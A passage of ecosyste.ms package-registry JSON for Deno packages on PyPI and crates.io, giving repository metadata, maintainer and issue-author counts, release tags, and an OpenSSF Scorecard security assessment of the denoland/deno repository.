/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":401,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/deno/codemeta","maintainers":[{"uuid":"manzt","login":"manzt","name":null,"email":null,"url":null,"packages_count":27,"html_url":"https://pypi.org/user/manzt/","role":"Owner","created_at":"2025-06-10T02:02:51.597Z","updated_at":"2025-06-10T02:02:51.597Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/manzt/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":933826,"maintainers_count":401404,"namespaces_count":0,"keywords_count":313756,"github":"pypi","metadata":{"funded_packages_count":59307,"rate_limit":2},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2026-09-05T05:02:05.769Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":11259045,"name":"deno_os","ecosystem":"cargo","description":"OS specific APIs for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":75,"first_release_published_at":"2025-01-13T18:06:42.585Z","latest_release_published_at":"2026-08-27T15:21:05.343Z","latest_release_number":"0.75.0","last_synced_at":"2026-09-07T22:54:32.560Z","created_at":"2025-01-13T18:32:29.500Z","updated_at":"2026-09-08T17:39:28.848Z","registry_url":"https://crates.io/crates/deno_os/","install_command":"cargo install deno_os","documentation_url":"https://docs.rs/deno_os/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/de